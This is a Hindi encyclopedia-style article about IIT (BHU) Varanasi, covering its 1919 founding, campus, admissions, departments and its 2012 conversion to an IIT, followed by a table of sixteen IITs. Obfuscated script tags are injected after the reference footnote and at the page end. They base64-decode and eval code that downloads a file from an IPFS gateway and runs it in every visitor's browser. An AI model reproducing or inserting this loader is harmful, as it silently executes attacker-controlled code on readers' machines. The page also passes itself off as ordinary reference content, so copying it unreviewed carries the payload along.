भारतीय प्रौद्योगिकी संस्थान (बी.एच.यू.) वाराणसी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
भारतीय प्रौद्योगिकी संस्थान वाराणसी, उत्तर प्रदेश

भारतीय प्रौद्योगिकी संस्थान का एक संस्थान 'भारतीय प्रौद्योगिकी संस्थान (काशी हिन्दू विश्वविद्यालय)' भारत के प्राचीन नगर वाराणसी में स्थित विज्ञान एवं अभियान्त्रिकी में शोध तथा स्नातक शिक्षा के लिए प्रसिद्ध एक शिक्षा संस्थान है। इस संस्थान को 'आई.आई.टी. - बी.एच.यू.' के नाम से भी जाना जाता है।

स्थापना

इस संस्थान की स्थापना सन् 1919 में उत्तर प्रदेश के वाराणसी नगर में हुई। यह संस्थान बनारस हिंदू विश्वविद्यालय (बीएचयू) के तत्वावधान में स्थापित एक इंजीनियरिंग संस्थान है। इस संस्थान में 13 विभाग हैं और यह संस्थान तीन अंतर-अनुशासनात्मक स्कूलों में तकनीकी शिक्षा प्रदान करता है। 1919 में स्थापित, यह संस्थान भारत के सबसे पुराने इंजीनियरिंग संस्थानों में से एक है। इसे नियमित रूप से भारत के सबसे अच्छे इंजीनियरिंग कॉलेजों में से एक गिना जाता है।

परिसर

आई.आई.टी. बी.एच.यू. परिसर वाराणसी के दक्षिणी छोर पर लगभग 1,300 एकड़ (5.3 km2) में गंगा नदी के तट पर फैला हुआ है। 1971 में 'बनारस इंजीनियरिंग कॉलेज' (BENCO), 'खनन और धातुकर्म' (MINMET) और 'प्रौद्योगिकी कॉलेज' (TECHNO) के एकीकरण के पश्चात् प्रौद्योगिकी संस्थान, काशी हिन्दू विश्वविद्यालय (आई.टी. बी.एच.यू.) अस्तित्व में आया। प्रौद्योगिकी संस्थान (अधिनियम 2012) के अंतर्गत 30 अप्रैल, 2012 को यह 'भारतीय प्रौद्योगिकी संस्थान' (आई.आई.टी.) में संशोधित किया गया।

प्रवेश

स्नातक छात्रों को प्रवेश प्राप्त करने के लिए भारतीय प्रौद्योगिकी संस्थान द्वारा आयोजित 'संयुक्त प्रवेश परीक्षा' के माध्यम से और स्नातककोत्तर के लिए इंजीनियरिंग में 'स्नातक योग्यता टेस्ट' (गेट) के माध्यम से प्रवेश होता है।

संस्थान का इतिहास

इस संस्थान की स्थापना सन्‌ 1919 में पंडित मदन मोहन मालवीय जी के द्वारा की गयी थी।

भारतीय प्रौद्योगिकी संस्थान

मानव संसाधन विकास मंत्रालय द्वारा गठित की गयी समितियों ने, जो क्रमश: प्रोफेसर जोशी और आनंद कृष्णन समितियाँ थीं, ने इस संस्थान को 'भारतीय प्रौद्योगिकी संस्थान (आई.आई.टी.)' में रूपांतरित करने की सिफारिश की, जिसके फलस्वरूप यह संस्थान देश की आई.आई.टी. प्रणाली के साथ एकीकृत हुआ। इस नये संस्थान को आई.आई.टी. बी.एच.यू., वाराणसी कहा गया। प्रौद्योगिकी संस्थान संशोधन विधेयक, 2012 आई.टी.-बी.एच.यू. को आई.आई.टी. (बी.एच.यू. ), वाराणसी घोषित करता है। 24 मार्च, 2011 को लोकसभा ने तथा 30 अप्रैल, 2012 को राज्य सभा ने इस विधेयक को पारित कर दिया।

परास्नातक पाठयक्रम

स्नातकोत्तर पाठ्यक्रमों में 'मास्टर ऑफ टैक्नोलॉजी' (एम. टेक) और पीएच.डी. की डिग्री प्रदान की जाती है। एम.टेक. पाठयक्रम के लिए प्रवेश 'अभियान्त्रिकी स्नातक योग्यता टेस्ट' (गेट) के माध्यम से किया जाता है।

स्नातक पाठयक्रम

आई.आई.टी. - बी.एच.यू. में विभिन्न विषयों में चार वर्ष के 'बैचलर ऑफ टैक्नोलॉजी' (बी.टेक.) और 'बैचलर ऑफ फार्मेसी' (B.Pharm) की डिग्री के लिए शिक्षण कार्यक्रम संचालित करता है। पांच साल के कार्यक्रम को एकीकृत दोहरी डिग्री कार्यक्रम और एकीकृत मास्टर डिग्री कार्यक्रम (आई.एम.डी.) में वर्गीकृत किया गया है।

विभाग

भारतीय प्रौद्योगिकी संस्थान (काशी हिन्दू विश्वविद्यालय) वाराणसी में निम्नलिखित शैक्षणिक विभाग है -

अभियान्त्रिकी

  1. संगणक विज्ञान एवम् अभियान्त्रिकी
  2. रसायन अभियान्त्रिकी
  3. सेरामिक अभियान्त्रिकी
  4. जनपद अभियान्त्रिकी
  5. विद्युत अभियान्त्रिकी
  6. इलेक्ट्रानिकी अभियान्त्रिकी
  7. यांत्रिक अभियान्त्रिकी
  8. खनन अभियान्त्रिकी
  9. धातुकर्म अभियान्त्रिकी

विज्ञान

  1. प्रयुक्त गणित
  2. प्रयुक्त भौतिकी
  3. प्रयुक्त रसायन
  4. भैषजिकी

अंतःविषय विद्यालय

  1. बायोकेमिकल इंजीनियरिंग
  2. पदार्थ विज्ञान और प्रौद्योगिकी
  3. बायोमेडिकल इंजीनियरिंग

भारत के प्रौद्योगिकी संस्थान

  • भारत में सोलह प्रौद्योगिकी संस्थान हैं[1] -
क्रम स्थापना नाम स्थान प्रदेश आधिकारिक वेबसाइट चित्र प्रतीक चिह्न
1 1961 भारतीय प्रौद्योगिकी संस्थान दिल्ली नई दिल्ली भारतीय प्रौद्योगिकी संस्थान, दिल्ली IIT-delhi.jpg Logo-iit delhi.jpg
2 1958 भारतीय प्रौद्योगिकी संस्थान मुम्बई महाराष्ट्र भारतीय प्रौद्योगिकी संस्थान, मुम्बई IIT-Bombay.jpg Logo iit mumbai.jpg
3 1959 भारतीय प्रौद्योगिकी संस्थान चेन्नई तमिलनाडु भारतीय प्रौद्योगिकी संस्थान, मद्रास Iit-madras.jpg Logo iit madras.jpg
4 1960 भारतीय प्रौद्योगिकी संस्थान कानपुर उत्तर प्रदेश भारतीय प्रौद्योगिकी संस्थान, कानपुर IIT-kanpur.jpg Logo iit kanpur.jpg
5 1950 भारतीय प्रौद्योगिकी संस्थान खड़गपुर पश्चिम बंगाल भारतीय प्रौद्योगिकी संस्थान, खड़गपुर · इंस्टिट्यूशन ऑफ इंजीनियर्स Indian-Institute-Of-Technology-Kharagpur.jpg Logo iit khadagpur.jpg
6 2001 भारतीय प्रौद्योगिकी संस्थान रुड़की उत्तरांचल भारतीय प्रौद्योगिकी संस्थान, रुड़की Indian-Institute-Of-Technology-Roorkee.jpg Logo iit roorkee.jpg
7 1995 भारतीय प्रौद्योगिकी संस्थान गुवाहाटी असम भारतीय प्रौद्योगिकी संस्थान, गुवाहाटी IIT-Guwahati.jpg Logo iit gauhati.jpg
8 1919 भारतीय प्रौद्योगिकी संस्थान (बी.एच.यू.) वाराणसी उत्तर प्रदेश भारतीय प्रौद्योगिकी संस्थान (बी.एच.यू.), वाराणसी IIT-BHU.png Logo iit bhu.jpg
9 2008 भारतीय प्रौद्योगिकी संस्थान हैदराबाद आन्ध्र प्रदेश भारतीय प्रौद्योगिकी संस्थान, हैदराबाद IIT-Hyderabad.jpg Logo iit haydarabad.jpg
10 2008 भारतीय प्रौद्योगिकी संस्थान रोपड़ पंजाब भारतीय प्रौद्योगिकी संस्थान, रोपड़ IIT-Ropar.jpg Logo iit ropad.jpg
11 2008 भारतीय प्रौद्योगिकी संस्थान गांधीनगर गुजरात भारतीय प्रौद्योगिकी संस्थान, गांधीनगर IIT-gandhinagar.jpg Logo iit gandhi nagar.jpg
12 2008 भारतीय प्रौद्योगिकी संस्थान भुवनेश्वर उड़ीसा भारतीय प्रौद्योगिकी संस्थान, भुवनेश्वर IIT-bhubaneshwar.gif Logo iit bhuvaneshvar.jpg
13 2008 भारतीय प्रौद्योगिकी संस्थान पटना बिहार भारतीय प्रौद्योगिकी संस्थान, पटना IIT-patna.jpg Logo iit patna.jpg
14 2008 भारतीय प्रौद्योगिकी संस्थान जोधपुर राजस्थान भारतीय प्रौद्योगिकी संस्थान, जोधपुर IIT-Jodhpur.jpg Logo iit jodhpur.jpg
15 2009 भारतीय प्रौद्योगिकी संस्थान इंदौर मध्य प्रदेश भारतीय प्रौद्योगिकी संस्थान, इंदौर IIT-indore-.jpg Logo iit indor.jpg
16 भारतीय प्रौद्योगिकी संस्थान मण्डी हिमाचल प्रदेश भारतीय प्रौद्योगिकी संस्थान, मण्डी IIT-mandi.jpg Logo iit mandi.jpg
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. अन्य भारतीय प्रौद्योगिकी संस्थान (हिंदी)। । अभिगमन तिथि: 21 जून, 2012।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>